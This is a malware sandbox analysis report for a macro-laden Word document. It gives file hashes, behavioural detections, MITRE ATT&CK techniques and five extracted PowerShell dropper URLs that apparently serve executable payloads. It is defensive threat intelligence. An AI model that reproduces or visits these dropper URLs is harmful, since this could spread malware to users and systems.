Overview

overview

10

Static

static

8

034737ddb1...18.doc

windows7-x64

10

034737ddb1...18.doc

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    034737ddb1d329d6c7972530e5444974_JaffaCakes118

  • Size

    172KB

  • Sample

    240427-py4alabd3x

  • MD5

    034737ddb1d329d6c7972530e5444974

  • SHA1

    baac7d5c80a72757866c34e0a066ee7dfa8fca39

  • SHA256

    ffbf6b1562b8ff882933b9ce4dc9234fd6fbdf6e5be7e645bc6e2461159929bf

  • SHA512

    c0badef0de8f29cd3668c01e5883d6ffe8d03ff95d7906fe7f9bce94019a262842c5d05094787b2452aac20d74bd8089016271f3e08b32ce2af7af26c6c9d806

  • SSDEEP

    3072:i77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qtz8iwrEJOyUU8RdlA:i77HUUUUUUUUUUUUUUUUUUUT52VZiwgT

Score
10/10
macro

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kellydarke.com/wp-content/Sd/
exe.dropper

http://aram-designs.com/en/Z53/
exe.dropper

http://basinhayati.net/wp-admin/Q0aw/
exe.dropper

http://7cut.extroliving.com/wp-content/3LYGE/
exe.dropper

http://allcosmeticsource.com/allcosmeticsource/OT9bg/

Targets

    • Target

      034737ddb1d329d6c7972530e5444974_JaffaCakes118

    • Size

      172KB

    • MD5

      034737ddb1d329d6c7972530e5444974

    • SHA1

      baac7d5c80a72757866c34e0a066ee7dfa8fca39

    • SHA256

      ffbf6b1562b8ff882933b9ce4dc9234fd6fbdf6e5be7e645bc6e2461159929bf

    • SHA512

      c0badef0de8f29cd3668c01e5883d6ffe8d03ff95d7906fe7f9bce94019a262842c5d05094787b2452aac20d74bd8089016271f3e08b32ce2af7af26c6c9d806

    • SSDEEP

      3072:i77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qtz8iwrEJOyUU8RdlA:i77HUUUUUUUUUUUUUUUUUUUT52VZiwgT

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Tasks